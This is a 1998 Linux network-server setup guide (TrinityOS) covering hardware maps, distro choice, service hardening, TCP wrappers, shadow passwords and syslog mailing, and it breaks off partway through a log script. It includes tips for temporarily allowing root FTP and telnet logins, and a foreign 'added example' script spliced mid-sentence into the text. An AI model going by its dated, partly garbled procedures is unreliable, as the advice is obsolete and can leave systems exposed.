06/14/98

TrinityOS - A Complete Linux network server configuration guide for the
Linux novice and Linux guru alike!

This document is intended for a technical audience that doesn't want to
research how to install the various Linux services by themselves.

This system design guide was initially based off the Slackware v3.2
distribution but due to a recent disk crash, I'm installing Redhat5 now.
I will now try to make the TrinityOS doc reflect both distros.

Note: Most of the functionality given in this document is available in a
STOCK installation of Redhat5, Debian, or any other modern Linux
distribution. So, if you are using any other distribution than Redhat or
Debian, use this doc as a reference or project management guide only.
You will then need to obtain and configure the new software for your Linux
distribution in its native methods.

** Please note that this document is still "Under Construction".
   Everything in the current features list has been implemented but isn't
   necessarily documented yet. If you have any specific questions, feel
   free to ask via email.

*********************************************************************
**                                                                 **
**  Do you want to get an e-mail when I update the TrinityOS doc?  **
**  Just send an e-mail to dranch@ecst.csuchico.edu with a subject **
**  of "Add me to your updates list" and I'll add you to the list! **
**                                                                 **
*********************************************************************

--David
dranch@trinnet.net

--------------------------------------------------------------------------------

Current Features:

Section
   1 - Intro
   2 - ChangeLOG (what you are reading now)
   3 - Current TrinityOS Feature set
   4 - Hardware configuration (I/O and disk maps)
   5 - Software download map and checklist
   6 - Linux distribution installation + OS patching (including notes for
       choosing a Distribution)
   7 - Initial System Security
   8 - Advanced System Logging and link to MASQ startup
   9 - MASQ startup and advanced firewall rulesets
  10 - Initial Linux Kernel compiling
  11 - Compile PPPd
  12 - Final Linux Kernel compiling and installation
  13 - Lilo configuration and installation
  14 - Additional RC script configuration and network optimization
  15 - Patching, Compiling, and installing IPFWADM
  16 - Mail aliases for system administration
  17 - Preparing for reboot and clearing the logs
  18 - Verifying MASQ module installation
  19 - Install TCPDUMP for tracing traffic
  20 - PPPd configuration
  21 - Diald configuration [For Modem users only]
  22 - BIND Installation and Configuration (only v4 complete)
  23 - Sendmail configuration
  24 - NTP Time calibration
  25 - DHCPd configuration
  26 - POP3 Mail
  27 - Configuring BRU and backing up
  28 - Full SSH telnet and X-windows encrypted tunnels
  ..
  34 - Final Security and up-to-date Linux Security & patching (NEVER complete!)

================================================================================

Section 2 - ChangeLOG

+--------------------------------------------------+
| Notice to all TrinityOS viewers:                 |
|                                                  |
| - If there are any sections that you would       |
|   like to be added/modified/corrected, etc,      |
|   just let me know!                              |
|   dranch@trinnet.net                             |
+--------------------------------------------------+

06/14/98 - Updated the SSH section to reflect upgrading to v1.2.25 to avoid a
           new SSH exploit.
           Section 28 and 34
         - Clarified the POP3 setup
           Section 26
         - Added some DNS (Bind) descriptions and security enhancements using
           the Bind v8.1.x "allow-transfer" and "xfernets" parameter. Also
           added a few other updates for my environment.
           Section 22
         - Changed over NTP clients to something a little more robust and
           added the URL to the main NTP site for people to find a local NTP
           server. Also updated the NTP stuff for both updating at 15mins or
           60mins and now have instructions for both Slackware and Redhat
           users.
           Section 24
         - Updated the distro descriptions and how Slackware, Redhat and
           Debian are different. The more I play with Redhat, the more I
           realize that it ISN'T a straightforward UNIX. I also added a few
           fixes for Redhat users on quirks I've noticed in v5.0.
           Section 6
         - Fixed a few things in the /etc/bruxpat file. Multi-volume ARJ
           files that start with EITHER an "A" or "a" (such as myfile.a01 and
           myfile.A01) are now not compressed.
           Section 27
         - Changed the DHCPd setup to reflect giving out DHCP addresses to
           (2) more machines.
           Section 25
         - Noted that I need to merge my existing Masq-PPP and
           Masq-Diald-PPP docs into TrinityOS.
           Section 3 and 20
         - Added more things to the "Future Features" section including:
           adding a CD-ROM changer, installing (2) HDs and (1) tape drive,
           implementing MD0 spanning or software-based RAID-5, setting up
           SPLIT-DNS, implementing automatic weekly incremental tape backups,
           and moving this doc over to HTML format
           Section 3
         - Made a bunch of minor layout changes

06/10/98 - Added SYSLOG (syslog, messages, kernel, maillog, etc) date parsing,
           filtering, and mailing. This is good for when you'd like to know if
           any strange things are happening to your Linux box (processes
           failing, hacker attempts, etc). This script also optionally
           monitors how many times your modem line came online (or failed due
           to busies, etc) and reports what speeds it connected at in a nice
           summarized table. The logs are then mailed to a specified mail
           address once a day. Nice!
           Section 8
         - Added the download recommendation of Netwatch for traffic monitoring
           Section 5
         - Updated the kernel section to reflect 2.0.34 and the new v1.16
           3c509.c driver
           Section 10
         - Added some slight changes recommended from Jim.Greer@autozone.com
         - Spelling, etc

06/01/98 - Added full SSH client and server encryption for TELNET, X-windows,
           etc
           Section 28
         - Can't believe I forgot this one: Updated network setup to use a
           larger TCP window size. Do this.. it makes a HUGE difference in LAN
           speed.
           Section 14
         - Added the patch-2.5.2.i386.rpm to fix the --nodep issues (should be
           in Redhat's Errata but isn't)

05/30/98 - Added a Redhat errata section to talk about how to update your
           machine to the newest, most secure code. I mention how to install
           RPMs in bulk, how Redhat documents their errata and specifically
           mention the installation of the following rpms:
             rpm-2.5.1-1.i386.rpm
             glibc-2.0.7-13.i386.rpm
             glibc-devel-2.0.7-13.i386.rpm
           Section 34

05/15/98 - Added a backup script for BRU to back this all up!
           Section 28
         - Made some format changes

05/08/98 - Added security issues/fixes for DIP and Xterm (apply these fixes!
           Users can get root EASY!)
           Section 34

04/27/98 - Added some changes to the /etc/rc.d/init.d/gpm file to properly
           support the old C7 Logitech mouse
           Section 14

04/22/98 - Added comsat for Redhat users (dumb to disable)
           Section 7

04/21/98 - Procps patch
           Section 34

04/19/98 - Added log rotation configs for the "syslog" file
         - Application of all recent Redhat OS patches
         - Added notes on how to choose a Linux distribution
         - Added rc.serial configs for advanced COMM port design and
           optimization.
         - Added patch info on the new OffbyONE Linux DoS attack

04/18/98 - Added a missing broadcast route for DHCP
         - Added a missing statement for sendmail masquerading

04/17/98 - Added Bind v8 configurations
         - Added sendmail envelope options
         - Added DHCPd support
         - Added Shadow passwords to Redhat5

04/12/98 - Added dynamic IP address configs for the advanced firewall rulesets

04/11/98 - Doh! Forgot the link to my PPP/Diald setup in section 19

04/10/98 - More major layout changes
         - Added Section labels
         - Added the Advanced firewall rulesets
         - Added configuration changes for BIND v8.x (not complete)

04/09/98 - Major document layout changes (hopefully more logical now)
         - Added modifications for the Redhat distribution
         - Added configuration setups for Cablemodems

04/06/98 - More Security stuff

04/01/98 - Published to WWW site
         - Added IP MASQ timeouts
         - Added additional formatting to this doc

02/09/09 - Added Xkeyboard issue
         - Device DoS
         - IMAP & IPOP

02/06/98 - Added Solar buffer-exploit handler

01/01/98 - Added more security stuff

12/09/97 - Added cron security issue and aliases

11/11/97 - WWW proxy / filtering

11/03/97 - Major changes

05/18/97 - Original start

================================================================================

Section 3 - Feature Sets

Current Features:

 + Full LAN masquerading (IP MASQ) using a private class B
 + Masq port forwarding support (IPportfw)
 + Advanced packet filter firewall ruleset
 + PPP connectivity to your ISP (for modem users)
 + Dial-on-Demand Internet connections (modem users)
 + Automatic Internet connections every 15 minutes (modem users)
 + Dual 10Mb/s Ethernet network support (3c509b) NICs (modem and cablemodem
   users) and network optimization
 + Full Bind v8 (and v4) DNS and DNS caching service
 + Full Sendmail mail system support w/ domain masquerading
 + TELNET, FTP, and POP3 services
 + Secured IP address telnet access
 + Modified telnet and ftp port addresses
 + Full SVGA X-Windows support (Xfree only. Metrox-X sucks)
 + Advanced SYSLOG logging
 + Advanced system security
 + DHCP server for other LAN machines (laptops, etc)
 + NTP time calibrated
 + SCSI-based TR4 tape backup via BRU
 + Full SSH telnet and X-windows encrypted tunnels

Future Features:

 - Add the new Nakamichi 7-CD CD-ROM changer to the system
 - Install the (2) new SCSI HDs and Hp TR4 tape drive
 - Implement either MD0 hard drive spanning or software-based RAID-5
 - Update the DNS setup to be a SPLIT-DNS setup for additional internal
   security
 - Full APC SmartUPS powerdown support
 - Full Samba Microsoft Windows file & printing support
 - Implement automatic weekly incremental tape backups to the TR4 tape drive.
 - Fold my existing Linux-PPP and Linux-Masq-PPP doc into TrinityOS.
 - Sound Blaster 16 and SB32AWE-PnP sound support
 - 128-bit encrypted Apache WWW server
 - BZip2 compression w/ tar patches
 - Iomega parallel ZIP drive support
 - Tripwire Security Breach monitoring
 - WWW Proxy services
 - WWW banner ad filtering
 - SATAN / COPS / ISS tested
 - Move this doc over to HTML format!!!!!!

=================================================================================

Section 4 - Hardware Configuration

This document uses methodologies that I have developed over time that have
saved my ass on several occasions (Drive partition maps, I/O and IRQ maps).
They may seem like a pain in the ass but they are a major help when things
break or you are adding new hardware.
--
- Distribution:
    - Redhat 5.x w/ all available patches
      or
    - Slackware v3.2 - Full install of Packages:
        - Slackware v3.2 Service Pack 2
        - Kernel v2.0.33 (The 2.1.x kernels don't have complete MASQ support
          yet)

Hardware Used:
    - ASUS GX4 Motherboard / 256k cache
    - AMD 486/160Mhz/40MB RAM
    - Network:
        Eth0: 3Com 3c509  (IRQ 9)  - cablemodem interface
        Eth1: 3Com 3C509b (IRQ 12) - Internal LAN interface
    - Video: Cirrus Logic 5429 VLB (2MB Dram)
    - Sound: Sound Blaster 16 (IRQ 10; DMA 1,6; Port 220, CD-Port 300)
    - Controllers:
        - Generic EIDE Controller (VLB) (IRQ 14,15)
        - Adaptec 1542b SCSI controller (IRQ 11, DMA 5, port 334)
    - Hard Drives:
        - HDA: Western Digital 1.0GB Caviar (EIDE) [LBA]
        - HDB: none
        - HDC: Western Digital 540MB (EIDE) [LBA]
        - HDD: Seagate 540MB (EIDE) [LBA]
        Dead: Western Digital 1.2GB Caviar (EIDE)
    - CD-Roms:
        - SBPCD0: Panasonic quad (dead drive?)
        - SCD0: Philips Quad
        - Nec 4x4 Quad speed / 4 Disc changer (future)
    - I/O: (See docs on IRQTUNE to better understand why these are like this.
            It makes a difference!)
        ttyS0: USR Courier v.Everything (IRQ 4)
        ttyS1: Dec Hub console (IRQ 3)
        ttyS2: APC SmartUPS UPS (IRQ 3)
        ttyS3: Logitech 3b mouse (IRQ 5)
        LPT1:  Hp LaserJet-IIp (samba share)
        LPT2:  Iomega Zip drive

------ I/O Maps and "Expert" fdisk partition tables -----

IRQ Map:
     0: timer (system)
     1: keyboard (system)
     2: Cascade (system)
     3: COM2-UPS (VLB controller) & COM3-HUB (ISA controller)
     4: COM1-modem (VLB controller)
     5: COM4-Mouse (ISA controller)
     6: Floppy (system)
     7: LPT1-printer
     8: Clock (system)
     9: Cascade-3c509 (cablemodem)
    10: SoundBlaster 16
    11: 1542b SCSI
    12: 3c509b (internal LAN)
    13: Math coprocessor
    14: IDE0
    15: IDE1

Port MAP:
    170-1F7h: IDE1
    1F0-1F7h: IDE0
    200-207h: (not used) usually Joystick
    220-22Fh: SoundBlaster 16
    230-233h: SoundBlaster 16 CD-ROM interface
    260-?h:   3c509b (eth1)
    278-27Fh: LPT1
    2A0-2AFh: 3c509 (eth0)
    2E8-2EFh: COM4
    2F8-2FFh: COM2
    330-331h: SoundBlaster MPU-401
    334-337h: Adaptec 1542b
    376-376h: IDE1
    378-37Fh: LPT1
    388-38Bh: SoundBlaster OPL2/3
    3E8-3EFh: COM3
    3F0-3F5h: Floppy drive
    3F6-3F6h: IDE0
    DC00h:    AHA1542b BIOS
    E400h:    System BIOS
    E800h:    System BIOS
    F000h:    System BIOS

DMA Map:
    0 - Dunno.
    1 - SoundBlaster16 LOW
    2 - Alternative Floppy DMA
    3 - Floppy DMA
    4 - Cascade
    5 - 1542b
    6 - SoundBlaster 16 HIGH

SCSI Map:
    0 - Conner 1060S - 1.05GB
    1 - Seagate ST21300N - 1.3GB
    2 -
    3 -
    4 - Philips 4x CD-Rom

/dev/hda (expert mode printout)

Disk /dev/hda: 64 heads, 63 sectors, 525 cylinders

Nr AF  Hd Sec  Cyl  Hd Sec  Cyl     Start      Size ID
 1 80   1   1    0  63  63   25        63    104769 06
 2 00   0   1   26  63  63  523    104832   2007936 05
 3 00   0   0    0   0   0    0         0         0 00
 4 00   0   0    0   0   0    0         0         0 00
 5 00   1   1   26  63  63   76        63    205569 82
 6 00   1   1   77  63  63  523        63   1802241 83

/dev/hdc (expert mode printout)

Disk /dev/hdc: 32 heads, 63 sectors, 524 cylinders

Nr AF  Hd Sec  Cyl  Hd Sec  Cyl     Start      Size ID
 1 00   1   1    0  31  63  511        63   1032129 83
 2 00   0   0    0   0   0    0         0         0 00
 3 00   0   0    0   0   0    0         0         0 00
 4 00   0   0    0   0   0    0         0         0 00

/dev/hdd (expert mode printout)

Disk /dev/hdc: 32 heads, 63 sectors, 524 cylinders

Nr AF  Hd Sec  Cyl  Hd Sec  Cyl     Start      Size ID
 1 00   1   1    0  31  63  511        63   1032129 83
 2 00   0   0    0   0   0    0         0         0 00
 3 00   0   0    0   0   0    0         0         0 00
 4 00   0   0    0   0   0    0         0         0 00

/dev/sda (expert mode printout)

Disk /dev/hdc: 32 heads, 63 sectors, 524 cylinders

Nr AF  Hd Sec  Cyl  Hd Sec  Cyl     Start      Size ID
 1 00   1   1    0  31  63  511        63   1032129 83
 2 00   0   0    0   0   0    0         0         0 00
 3 00   0   0    0   0   0    0         0         0 00
 4 00   0   0    0   0   0    0         0         0 00

/dev/sdb (expert mode printout)

Disk /dev/sdb: 64 heads, 32 sectors, 1006 cylinders

Nr AF  Hd Sec  Cyl  Hd Sec  Cyl     Start      Size ID
 1 00   1   1    0  63  32 1005        32   2060256 83
 2 00   0   0    0   0   0    0         0         0 00
 3 00   0   0    0   0   0    0         0         0 00
 4 00   0   0    0   0   0    0         0         0 00

BIOS Setup (Specific to the ASUS GX4 Award BIOS) - This is abbrev'ed here
for me:

Features:
    - Disabled
    - ON
    - Setup
    - Enabled
    - High
    - Enabled
    - Enabled
    - Enabled
    - Disabled
    - Enabled
    - Disabled
    - Disabled
    - C, A
    - 6
    - Disabled
    - Disabled
    - 250
    - Disabled

Chipset:
    Auto-Disabled Auto Sync BUS 1/4 Write-Thru Speed- faster 1 0 2 1T Non
    Enabled Disabled Enabled Enabled Enabled 2uS T2

Installed cards:
    VLB EIDE Controller w/ I/O [2-16550]
        IDE0:     Enabled
        IDE1:     Enabled
        Joystick: Disabled
        Serial1:  Enabled COM1/IRQ4 (modem)
        Serial2:  Enabled COM2/IRQ3 (UPS)
        Parallel: Enabled LPT1/polling (printer)
    ISA Multi-I/O
        Serial1:  Enabled COM3/IRQ3 (HUB)
        Serial2:  Enabled COM4/IRQ5 (Mouse)
        Parallel: Enabled LPT2/IRQ (ZIP)
        Joystick: Disabled
    SoundBlaster16:
        Joystick: Enabled

=================================================================================

Section 5 - Software download map and checklist

Initial Linux Distribution installation hints:

- If you ever need to FTP into the linux box as root (you CAN'T by default),
  edit the "/etc/ftpusers" file and put a "#" in front of "root".

  **** MAKE SURE YOU REMOVE THIS "#" ONCE YOU ARE DONE! ****

- Redhat: If you need to login via telnet as root (you CAN'T by default) then
  edit the /etc/securetty file and ADD:

    ttyp0
    ttyp1
    ttyp2

  **** MAKE SURE YOU PUT "#"s IN FRONT OF THESE NEW LINES ONCE YOU ARE DONE! ****

Needed software for implementation (in this order):

Done
----
 X  - Any Service Packs, security patches, etc for your installed Slackware
      distribution

 X  - Newest stable kernel at
        ftp://ftp.cdrom.com/pub/linux/sunsite/kernel/v2.0/

 X  - IPFWADM (the source must be downloaded regardless of whether it was
      installed with Redhat)
        Slackware: ftp://ftp.xos.nl/pub/linux/ipfwadm/ipfwadm-2.3.0.tar.gz
        Redhat:    ftp://ftp.xos.nl/pub/linux/ipfwadm/ipfwadm-2.3.0-1.src.rpm

 X  - The IPFWADM MASQ timeout patch at:
        http://ipmasq.home.ml.org/ipfwadm-2.3.0-generic-timeout.patch.gz
        http://hwy401.com/achau/ipmasq/ipfwadm-2.3.0-generic-timeout.patch.gz

 X  - IP Port forwarding
        Homepage: http://www.ox.compsoc.org.uk/~steve/portforwarding.html
        patches:  ftp://ftp.ox.compsoc.org.uk/pub/users/steve/ipsubs/sub-patch-1.32.gz

 X  - PPP - v2.3.3 (not needed for cablemodem users)
        http://www.cdrom.com/pub/linux/sunsite/system/network/serial/ppp/

 X  - Diald v0.16.4 (not needed for cablemodem users)
        http://www.dna.lth.se/~erics/diald.html

    - Full Named pipe monitoring

 X  - NAMED
      As of 4/17/98, the newest SECURE bind was only available in the CONTRIB
      area. It seems to work fine.
        ftp://ftp.redhat.com/pub/contrib/i386/bind-8.1.1-2.i386.rpm
        ftp://ftp.redhat.com/pub/contrib/i386/bind-utils-8.1.1-2.i386.rpm

 X  - Vlock (stock in Redhat if installed)
        http://www.cdrom.com/pub/linux/sunsite/utils/console/vlock-1.0.tar.gz

 X  - TCPDUMP (stock in Redhat if installed)
        http://www.cdrom.com/pub/linux/sunsite/system/network/management/
        or ftp://ftp.ee.lbl.gov/tcpdump.tar.Z

 X  - NetWatch
        ftp://ftp.digital.com/pub/linux/redhat/powertools-5.0/i386/

 X  - Getdate (NTP) - v1.1 (Was SETTIME)
        ftp://ftp.cdrom.com/pub/Linux/system/network/misc/getdate-1.1.tar.gz

 X  - Backing up: (stock in Redhat if installed)
        - BRU (it's not free but it's the best Linux backup software out
          there. This is one place you just CAN'T skimp!)
 X  - Netscape (stock in Redhat if installed)

    - Samba (stock in Redhat if installed) (this version fixes an exploit
      posted on Bugtraq)
        ftp://samba.anu.edu.au/pub/samba/samba-1.9.17p2.tar.gz

    - IP logger
        ftp://ftp.tu-graz.ac.at/pub/linux/redhat-contrib/SRPMS/iplogger-0.1-1.src.rpm

    - Tuning:
        - IRQTune
            ftp://shell5.ba.best.com/pub/cae/irqtune.tgz
        - HDparm -u

    - WWW proxy (Apache or Squid)

    - WWW Ad banner filtering
        http://www-math.uni-paderborn.de/~axel/NoShit/index.html
        patch:          http://www.america.com/~chrisf/web/NoShit/WebFilter_0.5.patch.gz
        Example filter: http://www.america.com/~chrisf/web/NoShit/library.txt

    - SB16 Mixer:
    - WAV recorder/player:

================================================================================

Section 6 - Linux Distribution Installation and OS patching

- Install Linux distribution (too complicated to be covered in this DOC)

Here are a few comments on what Linux distribution might be right for you:

Redhat:

  Redhat is a modern Linux distribution that has a good installation program
  and has some great system administration utilities too. The best part of
  Redhat is its incremental "RPM" installation and upgrade system. Another
  major reason for going with Redhat is its support for the new Glibc
  libraries. Redhat is constantly upgraded and is well supported in the Linux
  community.

  Redhat is a good choice for the Linux newbie that wants Linux up with all
  kinds of functionality without a lot of work. It comes with everything from
  TELNET/FTP to Microsoft and Novell file server emulation.

  If you are already a UNIX snob, you might find Redhat's layout somewhat
  weird (unless you are a Sun Solaris person since the /etc/rc3.d layout is
  similar). *BUT*.. if you want to *learn* UNIX (not specifically Linux)
  step-by-step and truly understand it (the hard but BEST way (IMHO)), don't
  install Redhat. Redhat changes the behavior of Linux to be easy to use,
  modifiable via scripts, etc.
  It doesn't do everything the UNIX way, though you can reverse engineer its
  scripts to understand what it really is doing. If you want to learn UNIX, go
  with Slackware or Debian.

Slackware:

  Slackware is one of the original Linux distributions and it is still one of
  my favorite distributions. It definitely isn't as slick in terms of
  installation or functionality compared to Redhat but it's laid out in a
  clear manner. Its INIT scripts (the scripts that are executed to bring the
  system up) use standard UNIX commands and everything is obvious and "in the
  open" (unlike Redhat). So, Slackware will be a comfortable fit for the UNIX
  people out there.

  THE major bummer about Slackware is that it hasn't had any major upgrades
  in quite some time. There have been rumors that Slackware will not even be
  upgraded unless someone else takes it over from Volker and upgrades it to
  Glibc, etc. I hope someone does!

Debian:

  Though I haven't installed Debian before, many people out there seem to
  like it a lot. It has been best described to me as a system that old
  Slackware users will LOVE. It doesn't include the kitchen sink like Redhat
  but it's laid out in a good manner, has its own RPM-like
  installation/upgrade system, and it supports the new Glibc library system.
  Like Redhat, Debian is constantly updated and well supported.

There are other Distributions out there to pick from depending on your
hardware platform (Dec Alpha, Motorola PowerPC, etc). You'll have to
experiment and ask other Linux people what distribution they like and WHY!

Upgrading/Updating your Linux distro:

  Like ANY Linux distribution, bug fixes, security releases, etc are always
  coming out and you NEED to stay on top of it. Redhat and Debian, with their
  incremental update systems, make this easy. Slackware users have to use the
  PKGADD or "Package Add" command and pray that it won't clobber their
  existing configuration files.

  Ps. If the program you upgrade to with PKGADD has different configuration
  file layouts, you will have to do the conversion manually. Debian and
  Redhat's systems will do the conversion for you.

Redhat users:

  Goto ftp://ftp.redhat.com/pub/redhat/updates/5.0/i386/ and download all the
  recent patches to a directory (ie. /tmp/patches).

  ** See Section 34 Date 5/30/98 for more specific instructions **

  Now, install them by doing:

    rpm -Uvh *.rpm

  *Note:* I have noticed that the "rpm" program will crash (coredump) about
  60% of the way through the process. You can safely figure out what patches
  it failed to install and do them manually or by doing the following:

  Say that the RPM program died while doing patching in the letter range (Q).
  So, do this to install all patches from Q to Z:

    rpm -Uvh [q-zQ-Z]*.rpm

Fixing Redhat:

  * These are things that I've noticed that are hosed in Redhat5.0 that might
    have been fixed in later CD cuts or releases.

  - Let tmp.watch run
      - Do a "chmod +x /etc/cron.daily/tmp.watch"

  - Fix the timezone
      - Edit /etc/profile
        Just above the "EXPORT PATH" line, add the line for Pacific Daylight
        time (adjust for your Time zone):

          TZ=PST8PDT

        Now edit the "EXPORT PATH" line and append the word "TZ"

================================================================================

Section 7 - Initial System security

- Put a password on the root login - "passwd root"

- Compile / install vlock (stock if installed with Redhat)

- Edit the "/etc/inetd.conf" file and comment out with a "#" all of the
  following lines (if they aren't already):

    echo, discard, daytime, chargen, comsat, time, nntp, smtp, shell, login,
    exec, talk, ntalk, pop3, imap2, uucp, tftp, bootps, finger, systat,
    netstat, netbios-ssn, netbios-ns, rstatd, ruserd, walld

  - You should leave "auth" enabled (firewall will fix this properly)
  - If you plan on using POP3 mail, don't disable "pop3"
  - If you want to use "biff" (command prompt mail notifier), don't comment
    it out here

- Edit the following files in "/etc/rc.d/"
  Slackware:
    - rc.M
        - line 75: #'d out all lines for Sendmail
        - line 97: #'d out all lines for httpd
    - rc.inet2
        - line 14: #'d out all lines for lpd
        - line 15: #'d out all lines for lpd
        - line 31: #'d out all lines for portmap
        - line 72: #'d out all lines for mountd, nfsd, pcnfsd, bwnfsd
        - line   : #'d out all lines for lpd

  Redhat (goto /etc/rc.d/rc3.d for Linux boxes running in the default init
  mode): Rename the following files unless already done.
    - mv S08autofs   K08autofs
    - mv S20nfs      K20nfs
    - mv S20rusersd  K20rusersd
    - mv S20rwalld   K20rwalld
    - mv S20rwhod    K20rwhod
    - mv S30mcserv   K30mcserv
    - mv S35smb      K35smb
    - mv S60lpd      K60lpd
    - mv S65portmap  K65portmap
    - mv S95nfsfs    K95nfsfs
    - mv S45pcmcia   K45pcmcia   (unless this is for a laptop)
    - mv S65dhcpd    K65dhcpd
    - mv S85httpd    K85httpd

=========TCP wrapper security=========

- Edit "/etc/hosts.deny" and insert the following at the end of the file:

    ALL: ALL

- Edit "/etc/hosts.allow" and insert lines at the end of the file for each IP
  and/or Domain that you want to allow access to the Linux box:

    ALL: 127.0.0.1     #Needed for some local services like comsat
    ALL: w.x.y.z

  For example:

    ALL: 192.168.0.2   #Allow everything from Stimpy2
    ALL: 192.168.0.4   #Allow everything from dellster

=========Shadow Passwords=========

Slackware
---------
Slackware v3.2 did not come with Shadow passwords enabled but v3.4 does. For
several reasons, I recommend that you just upgrade to Slackware v3.4. It fixes
numerous security issues and has many other features as well.

Redhat5
-------
Redhat5 out of the box does NOT do shadow passwords (stupid). But, it is
easily fixed. To fix this, do the following:

  - login as root
  - type in "pwconv"
      - This will convert the /etc/passwd file and move the encrypted
        passwords over to /etc/shadow
  - Edit the /etc/pam.d/password file and change the bottom line from:

      password required /lib/security/pam_pwdb.so use_authtok nullok

    --to--

      password required /lib/security/pam_pwdb.so shadow use_authtok nullok
                                                  ^^^^^^
  That's it.
================================================================================

Section 8 - Advanced System Logging and link to MASQ startup

- Edit /etc/syslog.conf

  Slackware:
  --
  *.warn;*.err                  /var/adm/syslog
  mail.*                        /var/adm/maillog
  auth.*;user.*;daemon.none     /var/adm/loginlog
  kern.*                        /var/adm/kernel
  --

  Redhat:
  --
  *.warn;*.err                  /var/log/syslog
  mail.*                        /var/log/maillog
  auth.*;user.*;daemon.none     /var/log/loginlog
  kern.*                        /var/log/kernel
  --

  Redhat users must do the following for the syslog file to work:

    touch /var/log/syslog

- Redhat: Next, allow the new syslog file to be rotated as well. Add these
  lines to /etc/logrotate.d/syslog:
  --
  /var/log/kernel {
      postrotate
          /usr/bin/killall -9 klogd
          /usr/sbin/klogd &
      endscript
  }

  /var/log/syslog {
      postrotate
          /usr/bin/killall -HUP syslogd
      endscript
  }
  --

- Edit the "/etc/rc.d/rc.local" file and add the following lines at the end:

  This tip is a personal idea I like: comment out the lines that rebuild
  /etc/issue at every boot by placing "#"s in front of them like shown:
  --
  ## This will overwrite /etc/issue at every boot. So, make any changes you
  ## want to make to /etc/issue here or you will lose them when you reboot.
  #echo "" > /etc/issue
  #echo "Red Hat Linux $R" >> /etc/issue
  #echo "Kernel $(uname -r) on $a $(uname -m)" >> /etc/issue
  #
  #cp -f /etc/issue /etc/issue.net
  --

  Then, do the following:
    - rm /etc/issue
    - rm /etc/issue.net

  Slackware users:
  --
  echo "Enabling tty logging"
  tail -f /var/adm/messages > /dev/tty7 &
  tail -f /var/adm/syslog > /dev/tty7 &
  --

  Redhat Users:
  --
  echo "Enabling /dev/tty logging.."
  tail -f /var/log/messages > /dev/tty7 &
  tail -f /var/log/syslog > /dev/tty7 &
  tail -f /var/log/secure > /dev/tty7 &

  #Run the IP MASQ and firewall script
  /etc/rc.d/rc.masq
  --

-----
Having the syslog logs filtered and mailed to you once a day...

If you are like me, you would like to know if any strange things are happening
to you (processes failing, hacker attempts, etc).
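Before the sendlogs script itself, here is an added example (not from the TrinityOS doc) of the same idea in a tighter form: one sed pass per log instead of the tmp/tmp2 shuffle, and one awk pass for the modem CONNECT/BUSY table instead of a grep per speed. The log lines written by make_sample_log are constructed for this example, and the noise patterns are a subset of the ones the sendlogs script uses.

```shell
#!/bin/sh
# Added example, not part of the TrinityOS doc: a compact version of the
# sendlogs idea.  filter_day keeps one day's lines and strips the chatter in a
# single sed pass; modem_stats builds the per-speed CONNECT table in one awk
# pass.  All log lines below are constructed for this example.

# Keep only lines whose syslog stamp matches the given "Mon dd" string (the
# format written by `date +'%b %e'`), then drop the noisy FTP/named lines.
# $1 = log file, $2 = date string, e.g. "Jun 13"
filter_day() {
    grep "^$2 " "$1" | sed \
        -e '/PWD/d'  -e '/PASV/d' -e '/TYPE/d' -e '/PORT/d' -e '/NLST/d' \
        -e '/SYST/d' -e '/PASS/d' -e '/QUIT/d' -e '/LIST/d' -e '/CDUP/d' \
        -e '/Lame server/d' -e '/Cleaned/d'
}

# Read filtered log lines on stdin and print a small summary table:
#   connects N / busy N / speed <bps> N ...  (sorted so the output is stable)
modem_stats() {
    awk '
        /CONNECT [0-9]+/ {
            connects++
            for (i = 1; i <= NF; i++) if ($i == "CONNECT") speed[$(i + 1)]++
        }
        /BUSY/ { busy++ }
        END {
            printf "connects %d\n", connects
            printf "busy %d\n", busy
            for (s in speed) printf "speed %s %d\n", s, speed[s]
        }' | sort
}

# Write a constructed /var/log/messages-style sample to the file named in $1.
make_sample_log() {
    cat > "$1" <<'EOF'
Jun 12 23:59:59 trinity sshd[77]: Generating new 768 bit RSA key.
Jun 13 00:01:02 trinity ftpd[201]: PWD
Jun 13 00:01:03 trinity ftpd[201]: RETR bigfile.tar.gz
Jun 13 00:01:04 trinity ftpd[201]: QUIT
Jun 13 02:10:00 trinity named[88]: Lame server on 'example.test' (in 'example.test'?)
Jun 13 03:15:22 trinity login[305]: FAILED LOGIN 1 FROM 192.168.0.9 FOR root
Jun 13 04:00:01 trinity pppd[410]: CONNECT 33600
Jun 13 05:00:01 trinity pppd[412]: BUSY
Jun 13 06:00:01 trinity pppd[414]: CONNECT 28800
Jun 13 07:00:01 trinity pppd[416]: CONNECT 33600
EOF
}

# Stand-alone demo: filter one day and print the modem table.  In a cron job
# the date argument would come from `cat /var/log/yesterdays-date` as in
# sendlogs, and the output would be piped to mail instead of printed.
SAMPLE=$(mktemp)
make_sample_log "$SAMPLE"
filter_day "$SAMPLE" "Jun 13"
filter_day "$SAMPLE" "Jun 13" | modem_stats
rm -f "$SAMPLE"
```

The FAILED LOGIN line survives the filter while the FTP and named chatter is dropped, which is the whole point of reading a filtered log rather than the raw one.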
The sendlogs script below also optionally monitors how many times your modem
line came online (or failed due to busies, etc) and reports what speeds it
connected at in a nice summarized table.

To do this, follow these next steps (note: this isn't the prettiest script
I've written and it needs a LOT of cleaning but it should work for you):

- Create the file

  Note: Slackware users: This file should be called /var/adm/sendlogs
        Redhat users:    This file should be called /var/log/sendlogs

  (Note: All users: you will need to substitute in your proper mail address
  (      (MAILTO below) so you will get your logs
  (
  (      Slackware users.. please change the /var/log references to
  (      /var/adm
  (
  (      Modem users: You will need to un-# out the modem fields and
  (      make sure that the temp file swapping from tmp to tmp2 to tmp
  (      etc transitions are correct.
  (
  (      I have this disabled because I'm a cablemodem dude
  (      now but this worked well.
----
#!/bin/sh
# updated 6/5/98
#
# Roll the date stamps: yesterday's stamp (as written by "date +'%b %e'") is
# what gets grepped out of each log.
mv /var/log/todays-date /var/log/yesterdays-date
date +'%b %e' > /var/log/todays-date
YDAY=`cat /var/log/yesterdays-date`
STAMP=`date +'%b%d%y'`
MAILTO=login@your.host        # <-- put your own mail address here

#---------------------------------------------
# /var/log/messages
MSG=messlog.$STAMP
grep "$YDAY" /var/log/messages > $MSG

#For messages - FTP and PPP chatter
sed -e "/PWD/d" -e "/PASV/d" -e "/TYPE/d" -e "/PORT/d" -e "/NLST/d" -e "/SYST/d" $MSG > $MSG.tmp
sed -e "/PASS/d" -e "/QUIT/d" -e "/LIST/d" -e "/CDUP/d" -e "/ATDT/d" -e "/Welcome/d" $MSG.tmp > $MSG.tmp2
sed -e "/Using/d" -e "/Connect/d" -e "/Remote/d" -e "/IP address/d" -e "/CHECKSUM/d" $MSG.tmp2 > $MSG.tmp
